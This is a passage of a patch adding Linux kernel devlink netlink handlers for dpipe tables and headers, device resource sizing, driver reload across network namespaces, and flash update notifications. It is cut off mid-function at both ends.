++
++	err = table->table_ops->entries_dump(table->priv,
++					     table->counters_enabled,
++					     &dump_ctx);
++	if (err)
++		return err;
++
++send_done:
++	nlh = nlmsg_put(dump_ctx.skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = devlink_dpipe_send_and_alloc_skb(&dump_ctx.skb, info);
++		if (err)
++			return err;
++		goto send_done;
++	}
++	return genlmsg_reply(dump_ctx.skb, info);
++}
++
++static int devlink_nl_cmd_dpipe_entries_get(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_dpipe_table *table;
++	const char *table_name;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_DPIPE_TABLE_NAME))
++		return -EINVAL;
++
++	table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	if (!table)
++		return -EINVAL;
++
++	if (!table->table_ops->entries_dump)
++		return -EINVAL;
++
++	return devlink_dpipe_entries_fill(info, DEVLINK_CMD_DPIPE_ENTRIES_GET,
++					  0, table);
++}
++
++static int devlink_dpipe_fields_put(struct sk_buff *skb,
++				    const struct devlink_dpipe_header *header)
++{
++	struct devlink_dpipe_field *field;
++	struct nlattr *field_attr;
++	int i;
++
++	for (i = 0; i < header->fields_count; i++) {
++		field = &header->fields[i];
++		field_attr = nla_nest_start_noflag(skb,
++						   DEVLINK_ATTR_DPIPE_FIELD);
++		if (!field_attr)
++			return -EMSGSIZE;
++		if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_FIELD_NAME, field->name) ||
++		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
++		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_BITWIDTH, field->bitwidth) ||
++		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_MAPPING_TYPE, field->mapping_type))
++			goto nla_put_failure;
++		nla_nest_end(skb, field_attr);
++	}
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, field_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_dpipe_header_put(struct sk_buff *skb,
++				    struct devlink_dpipe_header *header)
++{
++	struct nlattr *fields_attr, *header_attr;
++	int err;
++
++	header_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_HEADER);
++	if (!header_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_HEADER_NAME, header->name) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
++		goto nla_put_failure;
++
++	fields_attr = nla_nest_start_noflag(skb,
++					    DEVLINK_ATTR_DPIPE_HEADER_FIELDS);
++	if (!fields_attr)
++		goto nla_put_failure;
++
++	err = devlink_dpipe_fields_put(skb, header);
++	if (err) {
++		nla_nest_cancel(skb, fields_attr);
++		goto nla_put_failure;
++	}
++	nla_nest_end(skb, fields_attr);
++	nla_nest_end(skb, header_attr);
++	return 0;
++
++nla_put_failure:
++	err = -EMSGSIZE;
++	nla_nest_cancel(skb, header_attr);
++	return err;
++}
++
++static int devlink_dpipe_headers_fill(struct genl_info *info,
++				      enum devlink_command cmd, int flags,
++				      struct devlink_dpipe_headers *
++				      dpipe_headers)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct nlattr *headers_attr;
++	struct sk_buff *skb = NULL;
++	struct nlmsghdr *nlh;
++	void *hdr;
++	int i, j;
++	int err;
++
++	i = 0;
++start_again:
++	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
++			  &devlink_nl_family, NLM_F_MULTI, cmd);
++	if (!hdr) {
++		nlmsg_free(skb);
++		return -EMSGSIZE;
++	}
++
++	if (devlink_nl_put_handle(skb, devlink))
++		goto nla_put_failure;
++	headers_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_HEADERS);
++	if (!headers_attr)
++		goto nla_put_failure;
++
++	j = 0;
++	for (; i < dpipe_headers->headers_count; i++) {
++		err = devlink_dpipe_header_put(skb, dpipe_headers->headers[i]);
++		if (err) {
++			if (!j)
++				goto err_table_put;
++			break;
++		}
++		j++;
++	}
++	nla_nest_end(skb, headers_attr);
++	genlmsg_end(skb, hdr);
++	if (i != dpipe_headers->headers_count)
++		goto start_again;
++
++send_done:
++	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++		if (err)
++			return err;
++		goto send_done;
++	}
++	return genlmsg_reply(skb, info);
++
++nla_put_failure:
++	err = -EMSGSIZE;
++err_table_put:
++	nlmsg_free(skb);
++	return err;
++}
++
++static int devlink_nl_cmd_dpipe_headers_get(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++
++	if (!devlink->dpipe_headers)
++		return -EOPNOTSUPP;
++	return devlink_dpipe_headers_fill(info, DEVLINK_CMD_DPIPE_HEADERS_GET,
++					  0, devlink->dpipe_headers);
++}
++
++static int devlink_dpipe_table_counters_set(struct devlink *devlink,
++					    const char *table_name,
++					    bool enable)
++{
++	struct devlink_dpipe_table *table;
++
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	if (!table)
++		return -EINVAL;
++
++	if (table->counter_control_extern)
++		return -EOPNOTSUPP;
++
++	if (!(table->counters_enabled ^ enable))
++		return 0;
++
++	table->counters_enabled = enable;
++	if (table->table_ops->counters_set_update)
++		table->table_ops->counters_set_update(table->priv, enable);
++	return 0;
++}
++
++static int devlink_nl_cmd_dpipe_table_counters_set(struct sk_buff *skb,
++						   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const char *table_name;
++	bool counters_enable;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_DPIPE_TABLE_NAME) ||
++	    GENL_REQ_ATTR_CHECK(info,
++				DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED))
++		return -EINVAL;
++
++	table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
++	counters_enable = !!nla_get_u8(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED]);
++
++	return devlink_dpipe_table_counters_set(devlink, table_name,
++						counters_enable);
++}
++
++static struct devlink_resource *
++devlink_resource_find(struct devlink *devlink,
++		      struct devlink_resource *resource, u64 resource_id)
++{
++	struct list_head *resource_list;
++
++	if (resource)
++		resource_list = &resource->resource_list;
++	else
++		resource_list = &devlink->resource_list;
++
++	list_for_each_entry(resource, resource_list, list) {
++		struct devlink_resource *child_resource;
++
++		if (resource->id == resource_id)
++			return resource;
++
++		child_resource = devlink_resource_find(devlink, resource,
++						       resource_id);
++		if (child_resource)
++			return child_resource;
++	}
++	return NULL;
++}
++
++static void
++devlink_resource_validate_children(struct devlink_resource *resource)
++{
++	struct devlink_resource *child_resource;
++	bool size_valid = true;
++	u64 parts_size = 0;
++
++	if (list_empty(&resource->resource_list))
++		goto out;
++
++	list_for_each_entry(child_resource, &resource->resource_list, list)
++		parts_size += child_resource->size_new;
++
++	if (parts_size > resource->size_new)
++		size_valid = false;
++out:
++	resource->size_valid = size_valid;
++}
++
++static int
++devlink_resource_validate_size(struct devlink_resource *resource, u64 size,
++			       struct netlink_ext_ack *extack)
++{
++	u64 reminder;
++	int err = 0;
++
++	if (size > resource->size_params.size_max) {
++		NL_SET_ERR_MSG_MOD(extack, "Size larger than maximum");
++		err = -EINVAL;
++	}
++
++	if (size < resource->size_params.size_min) {
++		NL_SET_ERR_MSG_MOD(extack, "Size smaller than minimum");
++		err = -EINVAL;
++	}
++
++	div64_u64_rem(size, resource->size_params.size_granularity, &reminder);
++	if (reminder) {
++		NL_SET_ERR_MSG_MOD(extack, "Wrong granularity");
++		err = -EINVAL;
++	}
++
++	return err;
++}
++
++static int devlink_nl_cmd_resource_set(struct sk_buff *skb,
++				       struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_resource *resource;
++	u64 resource_id;
++	u64 size;
++	int err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_RESOURCE_ID) ||
++	    GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_RESOURCE_SIZE))
++		return -EINVAL;
++	resource_id = nla_get_u64(info->attrs[DEVLINK_ATTR_RESOURCE_ID]);
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (!resource)
++		return -EINVAL;
++
++	size = nla_get_u64(info->attrs[DEVLINK_ATTR_RESOURCE_SIZE]);
++	err = devlink_resource_validate_size(resource, size, info->extack);
++	if (err)
++		return err;
++
++	resource->size_new = size;
++	devlink_resource_validate_children(resource);
++	if (resource->parent)
++		devlink_resource_validate_children(resource->parent);
++	return 0;
++}
++
++static int
++devlink_resource_size_params_put(struct devlink_resource *resource,
++				 struct sk_buff *skb)
++{
++	struct devlink_resource_size_params *size_params;
++
++	size_params = &resource->size_params;
++	if (nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_GRAN,
++			      size_params->size_granularity, DEVLINK_ATTR_PAD) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_MAX,
++			      size_params->size_max, DEVLINK_ATTR_PAD) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_MIN,
++			      size_params->size_min, DEVLINK_ATTR_PAD) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_RESOURCE_UNIT, size_params->unit))
++		return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_resource_occ_put(struct devlink_resource *resource,
++				    struct sk_buff *skb)
++{
++	if (!resource->occ_get)
++		return 0;
++	return nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_OCC,
++				 resource->occ_get(resource->occ_get_priv),
++				 DEVLINK_ATTR_PAD);
++}
++
++static int devlink_resource_put(struct devlink *devlink, struct sk_buff *skb,
++				struct devlink_resource *resource)
++{
++	struct devlink_resource *child_resource;
++	struct nlattr *child_resource_attr;
++	struct nlattr *resource_attr;
++
++	resource_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_RESOURCE);
++	if (!resource_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_string(skb, DEVLINK_ATTR_RESOURCE_NAME, resource->name) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE, resource->size,
++			      DEVLINK_ATTR_PAD) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_ID, resource->id,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (resource->size != resource->size_new)
++		nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_NEW,
++				  resource->size_new, DEVLINK_ATTR_PAD);
++	if (devlink_resource_occ_put(resource, skb))
++		goto nla_put_failure;
++	if (devlink_resource_size_params_put(resource, skb))
++		goto nla_put_failure;
++	if (list_empty(&resource->resource_list))
++		goto out;
++
++	if (nla_put_u8(skb, DEVLINK_ATTR_RESOURCE_SIZE_VALID,
++		       resource->size_valid))
++		goto nla_put_failure;
++
++	child_resource_attr = nla_nest_start_noflag(skb,
++						    DEVLINK_ATTR_RESOURCE_LIST);
++	if (!child_resource_attr)
++		goto nla_put_failure;
++
++	list_for_each_entry(child_resource, &resource->resource_list, list) {
++		if (devlink_resource_put(devlink, skb, child_resource))
++			goto resource_put_failure;
++	}
++
++	nla_nest_end(skb, child_resource_attr);
++out:
++	nla_nest_end(skb, resource_attr);
++	return 0;
++
++resource_put_failure:
++	nla_nest_cancel(skb, child_resource_attr);
++nla_put_failure:
++	nla_nest_cancel(skb, resource_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_resource_fill(struct genl_info *info,
++				 enum devlink_command cmd, int flags)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_resource *resource;
++	struct nlattr *resources_attr;
++	struct sk_buff *skb = NULL;
++	struct nlmsghdr *nlh;
++	bool incomplete;
++	void *hdr;
++	int i;
++	int err;
++
++	resource = list_first_entry(&devlink->resource_list,
++				    struct devlink_resource, list);
++start_again:
++	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
++			  &devlink_nl_family, NLM_F_MULTI, cmd);
++	if (!hdr) {
++		nlmsg_free(skb);
++		return -EMSGSIZE;
++	}
++
++	if (devlink_nl_put_handle(skb, devlink))
++		goto nla_put_failure;
++
++	resources_attr = nla_nest_start_noflag(skb,
++					       DEVLINK_ATTR_RESOURCE_LIST);
++	if (!resources_attr)
++		goto nla_put_failure;
++
++	incomplete = false;
++	i = 0;
++	list_for_each_entry_from(resource, &devlink->resource_list, list) {
++		err = devlink_resource_put(devlink, skb, resource);
++		if (err) {
++			if (!i)
++				goto err_resource_put;
++			incomplete = true;
++			break;
++		}
++		i++;
++	}
++	nla_nest_end(skb, resources_attr);
++	genlmsg_end(skb, hdr);
++	if (incomplete)
++		goto start_again;
++send_done:
++	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++		if (err)
++			return err;
++		goto send_done;
++	}
++	return genlmsg_reply(skb, info);
++
++nla_put_failure:
++	err = -EMSGSIZE;
++err_resource_put:
++	nlmsg_free(skb);
++	return err;
++}
++
++static int devlink_nl_cmd_resource_dump(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++
++	if (list_empty(&devlink->resource_list))
++		return -EOPNOTSUPP;
++
++	return devlink_resource_fill(info, DEVLINK_CMD_RESOURCE_DUMP, 0);
++}
++
++static int
++devlink_resources_validate(struct devlink *devlink,
++			   struct devlink_resource *resource,
++			   struct genl_info *info)
++{
++	struct list_head *resource_list;
++	int err = 0;
++
++	if (resource)
++		resource_list = &resource->resource_list;
++	else
++		resource_list = &devlink->resource_list;
++
++	list_for_each_entry(resource, resource_list, list) {
++		if (!resource->size_valid)
++			return -EINVAL;
++		err = devlink_resources_validate(devlink, resource, info);
++		if (err)
++			return err;
++	}
++	return err;
++}
++
++static struct net *devlink_netns_get(struct sk_buff *skb,
++				     struct genl_info *info)
++{
++	struct nlattr *netns_pid_attr = info->attrs[DEVLINK_ATTR_NETNS_PID];
++	struct nlattr *netns_fd_attr = info->attrs[DEVLINK_ATTR_NETNS_FD];
++	struct nlattr *netns_id_attr = info->attrs[DEVLINK_ATTR_NETNS_ID];
++	struct net *net;
++
++	if (!!netns_pid_attr + !!netns_fd_attr + !!netns_id_attr > 1) {
++		NL_SET_ERR_MSG_MOD(info->extack, "multiple netns identifying attributes specified");
++		return ERR_PTR(-EINVAL);
++	}
++
++	if (netns_pid_attr) {
++		net = get_net_ns_by_pid(nla_get_u32(netns_pid_attr));
++	} else if (netns_fd_attr) {
++		net = get_net_ns_by_fd(nla_get_u32(netns_fd_attr));
++	} else if (netns_id_attr) {
++		net = get_net_ns_by_id(sock_net(skb->sk),
++				       nla_get_u32(netns_id_attr));
++		if (!net)
++			net = ERR_PTR(-EINVAL);
++	} else {
++		WARN_ON(1);
++		net = ERR_PTR(-EINVAL);
++	}
++	if (IS_ERR(net)) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Unknown network namespace");
++		return ERR_PTR(-EINVAL);
++	}
++	if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN)) {
++		put_net(net);
++		return ERR_PTR(-EPERM);
++	}
++	return net;
++}
++
++static void devlink_param_notify(struct devlink *devlink,
++				 unsigned int port_index,
++				 struct devlink_param_item *param_item,
++				 enum devlink_command cmd);
++
++static void devlink_ns_change_notify(struct devlink *devlink,
++				     struct net *dest_net, struct net *curr_net,
++				     bool new)
++{
++	struct devlink_param_item *param_item;
++	enum devlink_command cmd;
++
++	/* Userspace needs to be notified about devlink objects
++	 * removed from original and entering new network namespace.
++	 * The rest of the devlink objects are re-created during
++	 * reload process so the notifications are generated separatelly.
++	 */
++
++	if (!dest_net || net_eq(dest_net, curr_net))
++		return;
++
++	if (new)
++		devlink_notify(devlink, DEVLINK_CMD_NEW);
++
++	cmd = new ? DEVLINK_CMD_PARAM_NEW : DEVLINK_CMD_PARAM_DEL;
++	list_for_each_entry(param_item, &devlink->param_list, list)
++		devlink_param_notify(devlink, 0, param_item, cmd);
++
++	if (!new)
++		devlink_notify(devlink, DEVLINK_CMD_DEL);
++}
++
++static bool devlink_reload_supported(const struct devlink_ops *ops)
++{
++	return ops->reload_down && ops->reload_up;
++}
++
++static void devlink_reload_failed_set(struct devlink *devlink,
++				      bool reload_failed)
++{
++	if (devlink->reload_failed == reload_failed)
++		return;
++	devlink->reload_failed = reload_failed;
++	devlink_notify(devlink, DEVLINK_CMD_NEW);
++}
++
++bool devlink_is_reload_failed(const struct devlink *devlink)
++{
++	return devlink->reload_failed;
++}
++EXPORT_SYMBOL_GPL(devlink_is_reload_failed);
++
++static void
++__devlink_reload_stats_update(struct devlink *devlink, u32 *reload_stats,
++			      enum devlink_reload_limit limit, u32 actions_performed)
++{
++	unsigned long actions = actions_performed;
++	int stat_idx;
++	int action;
++
++	for_each_set_bit(action, &actions, __DEVLINK_RELOAD_ACTION_MAX) {
++		stat_idx = limit * __DEVLINK_RELOAD_ACTION_MAX + action;
++		reload_stats[stat_idx]++;
++	}
++	devlink_notify(devlink, DEVLINK_CMD_NEW);
++}
++
++static void
++devlink_reload_stats_update(struct devlink *devlink, enum devlink_reload_limit limit,
++			    u32 actions_performed)
++{
++	__devlink_reload_stats_update(devlink, devlink->stats.reload_stats, limit,
++				      actions_performed);
++}
++
++/**
++ *	devlink_remote_reload_actions_performed - Update devlink on reload actions
++ *	  performed which are not a direct result of devlink reload call.
++ *
++ *	This should be called by a driver after performing reload actions in case it was not
++ *	a result of devlink reload call. For example fw_activate was performed as a result
++ *	of devlink reload triggered fw_activate on another host.
++ *	The motivation for this function is to keep data on reload actions performed on this
++ *	function whether it was done due to direct devlink reload call or not.
++ *
++ *	@devlink: devlink
++ *	@limit: reload limit
++ *	@actions_performed: bitmask of actions performed
++ */
++void devlink_remote_reload_actions_performed(struct devlink *devlink,
++					     enum devlink_reload_limit limit,
++					     u32 actions_performed)
++{
++	if (WARN_ON(!actions_performed ||
++		    actions_performed & BIT(DEVLINK_RELOAD_ACTION_UNSPEC) ||
++		    actions_performed >= BIT(__DEVLINK_RELOAD_ACTION_MAX) ||
++		    limit > DEVLINK_RELOAD_LIMIT_MAX))
++		return;
++
++	__devlink_reload_stats_update(devlink, devlink->stats.remote_reload_stats, limit,
++				      actions_performed);
++}
++EXPORT_SYMBOL_GPL(devlink_remote_reload_actions_performed);
++
++static int devlink_reload(struct devlink *devlink, struct net *dest_net,
++			  enum devlink_reload_action action, enum devlink_reload_limit limit,
++			  u32 *actions_performed, struct netlink_ext_ack *extack)
++{
++	u32 remote_reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
++	struct net *curr_net;
++	int err;
++
++	memcpy(remote_reload_stats, devlink->stats.remote_reload_stats,
++	       sizeof(remote_reload_stats));
++
++	curr_net = devlink_net(devlink);
++	devlink_ns_change_notify(devlink, dest_net, curr_net, false);
++	err = devlink->ops->reload_down(devlink, !!dest_net, action, limit, extack);
++	if (err)
++		return err;
++
++	if (dest_net && !net_eq(dest_net, curr_net))
++		write_pnet(&devlink->_net, dest_net);
++
++	err = devlink->ops->reload_up(devlink, action, limit, actions_performed, extack);
++	devlink_reload_failed_set(devlink, !!err);
++	if (err)
++		return err;
++
++	devlink_ns_change_notify(devlink, dest_net, curr_net, true);
++	WARN_ON(!(*actions_performed & BIT(action)));
++	/* Catch driver on updating the remote action within devlink reload */
++	WARN_ON(memcmp(remote_reload_stats, devlink->stats.remote_reload_stats,
++		       sizeof(remote_reload_stats)));
++	devlink_reload_stats_update(devlink, limit, *actions_performed);
++	return 0;
++}
++
++static int
++devlink_nl_reload_actions_performed_snd(struct devlink *devlink, u32 actions_performed,
++					enum devlink_command cmd, struct genl_info *info)
++{
++	struct sk_buff *msg;
++	void *hdr;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	hdr = genlmsg_put(msg, info->snd_portid, info->snd_seq, &devlink_nl_family, 0, cmd);
++	if (!hdr)
++		goto free_msg;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_bitfield32(msg, DEVLINK_ATTR_RELOAD_ACTIONS_PERFORMED, actions_performed,
++			       actions_performed))
++		goto nla_put_failure;
++	genlmsg_end(msg, hdr);
++
++	return genlmsg_reply(msg, info);
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++free_msg:
++	nlmsg_free(msg);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_reload(struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	enum devlink_reload_action action;
++	enum devlink_reload_limit limit;
++	struct net *dest_net = NULL;
++	u32 actions_performed;
++	int err;
++
++	if (!(devlink->features & DEVLINK_F_RELOAD))
++		return -EOPNOTSUPP;
++
++	err = devlink_resources_validate(devlink, NULL, info);
++	if (err) {
++		NL_SET_ERR_MSG_MOD(info->extack, "resources size validation failed");
++		return err;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_RELOAD_ACTION])
++		action = nla_get_u8(info->attrs[DEVLINK_ATTR_RELOAD_ACTION]);
++	else
++		action = DEVLINK_RELOAD_ACTION_DRIVER_REINIT;
++
++	if (!devlink_reload_action_is_supported(devlink, action)) {
++		NL_SET_ERR_MSG_MOD(info->extack,
++				   "Requested reload action is not supported by the driver");
++		return -EOPNOTSUPP;
++	}
++
++	limit = DEVLINK_RELOAD_LIMIT_UNSPEC;
++	if (info->attrs[DEVLINK_ATTR_RELOAD_LIMITS]) {
++		struct nla_bitfield32 limits;
++		u32 limits_selected;
++
++		limits = nla_get_bitfield32(info->attrs[DEVLINK_ATTR_RELOAD_LIMITS]);
++		limits_selected = limits.value & limits.selector;
++		if (!limits_selected) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Invalid limit selected");
++			return -EINVAL;
++		}
++		for (limit = 0 ; limit <= DEVLINK_RELOAD_LIMIT_MAX ; limit++)
++			if (limits_selected & BIT(limit))
++				break;
++		/* UAPI enables multiselection, but currently it is not used */
++		if (limits_selected != BIT(limit)) {
++			NL_SET_ERR_MSG_MOD(info->extack,
++					   "Multiselection of limit is not supported");
++			return -EOPNOTSUPP;
++		}
++		if (!devlink_reload_limit_is_supported(devlink, limit)) {
++			NL_SET_ERR_MSG_MOD(info->extack,
++					   "Requested limit is not supported by the driver");
++			return -EOPNOTSUPP;
++		}
++		if (devlink_reload_combination_is_invalid(action, limit)) {
++			NL_SET_ERR_MSG_MOD(info->extack,
++					   "Requested limit is invalid for this action");
++			return -EINVAL;
++		}
++	}
++	if (info->attrs[DEVLINK_ATTR_NETNS_PID] ||
++	    info->attrs[DEVLINK_ATTR_NETNS_FD] ||
++	    info->attrs[DEVLINK_ATTR_NETNS_ID]) {
++		dest_net = devlink_netns_get(skb, info);
++		if (IS_ERR(dest_net))
++			return PTR_ERR(dest_net);
++	}
++
++	err = devlink_reload(devlink, dest_net, action, limit, &actions_performed, info->extack);
++
++	if (dest_net)
++		put_net(dest_net);
++
++	if (err)
++		return err;
++	/* For backward compatibility generate reply only if attributes used by user */
++	if (!info->attrs[DEVLINK_ATTR_RELOAD_ACTION] && !info->attrs[DEVLINK_ATTR_RELOAD_LIMITS])
++		return 0;
++
++	return devlink_nl_reload_actions_performed_snd(devlink, actions_performed,
++						       DEVLINK_CMD_RELOAD, info);
++}
++
++static int devlink_nl_flash_update_fill(struct sk_buff *msg,
++					struct devlink *devlink,
++					enum devlink_command cmd,
++					struct devlink_flash_notify *params)
++{
++	void *hdr;
++
++	hdr = genlmsg_put(msg, 0, 0, &devlink_nl_family, 0, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (cmd != DEVLINK_CMD_FLASH_UPDATE_STATUS)
++		goto out;
++
++	if (params->status_msg &&
++	    nla_put_string(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_MSG,
++			   params->status_msg))
++		goto nla_put_failure;
++	if (params->component &&
++	    nla_put_string(msg, DEVLINK_ATTR_FLASH_UPDATE_COMPONENT,
++			   params->component))
++		goto nla_put_failure;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_DONE,
++			      params->done, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_TOTAL,
++			      params->total, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_TIMEOUT,
++			      params->timeout, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++out:
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void __devlink_flash_update_notify(struct devlink *devlink,
++					  enum devlink_command cmd,
++					  struct devlink_flash_notify *params)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_FLASH_UPDATE &&
++		cmd != DEVLINK_CMD_FLASH_UPDATE_END &&
++		cmd != DEVLINK_CMD_FLASH_UPDATE_STATUS);
++
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_flash_update_fill(msg, devlink, cmd, params);
++	if (err)
++		goto out_free_msg;
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++	return;
++
++out_free_msg:
++	nlmsg_free(msg);
++}
++
++static void devlink_flash_update_begin_notify(struct devlink *devlink)
++{
++	struct devlink_flash_notify params = {};
++
++	__devlink_flash_update_notify(devlink,
++				      DEVLINK_CMD_FLASH_UPDATE,
++				      &params);
++}
++
++static void devlink_flash_update_end_notify(struct devlink *devlink)
++{
++	struct devlink_flash_notify params = {};
++
++	__devlink_flash_update_notify(devlink,
++				      DEVLINK_CMD_FLASH_UPDATE_END,
++				      &params);
++}
++
++void devlink_flash_update_status_notify(struct devlink *devlink,
++					const char *status_msg,
++					const char *component,
++					unsigned long done,
++					unsigned long total)
++{
++	struct devlink_flash_notify params = {
++		.status_msg = status_msg,
++		.component = component,
++		.done = done,
++		.total = total,
++	};
++
++	__devlink_flash_update_notify(devlink,
++				      DEVLINK_CMD_FLASH_UPDATE_STATUS,
++				      &params);
++}
++EXPORT_SYMBOL_GPL(devlink_flash_update_status_notify);
++
++void devlink_flash_update_timeout_notify(struct devlink *devlink,
++					 const char *status_msg,
++					 const char *component,
++					 unsigned long timeout)
++{
++	struct devlink_flash_notify params = {
++		.status_msg = status_msg,
++		.component = component,
++		.timeout = timeout,
++	};
++
++	__devlink_flash_update_notify(devlink,
++				      DEVLINK_CMD_FLASH_UPDATE_STATUS,
++				      &params);
++}
++EXPORT_SYMBOL_GPL(devlink_flash_update_timeout_notify);
++
++struct devlink_info_req {
++	struct sk_buff *msg;
++	void (*version_cb)(const char *version_name,
++			   enum devlink_info_version_type version_type,
++			   void *version_cb_priv);
++	void *version_cb_priv;
++};
++
++struct devlink_flash_component_lookup_ctx {
++	const char *lookup_name;
++	bool lookup_name_found;
++};
++
++static void
++devlink_flash_component_lookup_cb(const char *version_name,
++				  enum devlink_info_version_type version_type,
++				  void *version_cb_priv)
++{
++	struct devlink_flash_component_lookup_ctx *lookup_ctx = version_cb_priv;
++
++	if (version_type != DEVLINK_INFO_VERSION_TYPE_COMPONENT ||
++	    lookup_ctx->lookup_name_found)
++		return;
++
++	lookup_ctx->lookup_name_found =
++		!strcmp(lookup_ctx->lookup_name, version_name);
++}
++
++static int devlink_flash_component_get(struct devlink *devlink,
++				       struct nlattr *nla_component,
++				       const char **p_component,
++				       struct netlink_ext_ack *extack)
++{
++	struct devlink_flash_component_lookup_ctx lookup_ctx = {};
++	struct devlink_info_req req = {};
++	const char *component;
++	int ret;
++
++	if (!nla_component)
++		return 0;
++
++	component = nla_data(nla_component);
++
++	if (!devlink->ops->info_get) {
++		NL_SET_ERR_MSG_ATTR(extack, nla_component,
++				    "component update is not supported by this device");
++		return -EOPNOTSUPP;
++	}
++
++	lookup_ctx.lookup_name = component;
++	req.version_cb = devlink_flash_component_lookup_cb;
++	req.version_cb_priv = &lookup_ctx;
++
++	ret = devlink->ops->info_get(devlink, &req, NULL);
++	if (ret)
++		return ret;
++
++	if (!lookup_ctx.lookup_name_found) {
++		NL_SET_ERR_MSG_ATTR(extack, nla_component,
++				    "selected component is not supported by this device");
++		return -EINVAL;
++	}
++	*p_component = component;
++	return 0;
++}
++
++static int devlink_nl_cmd_flash_update(struct sk_buff *skb,
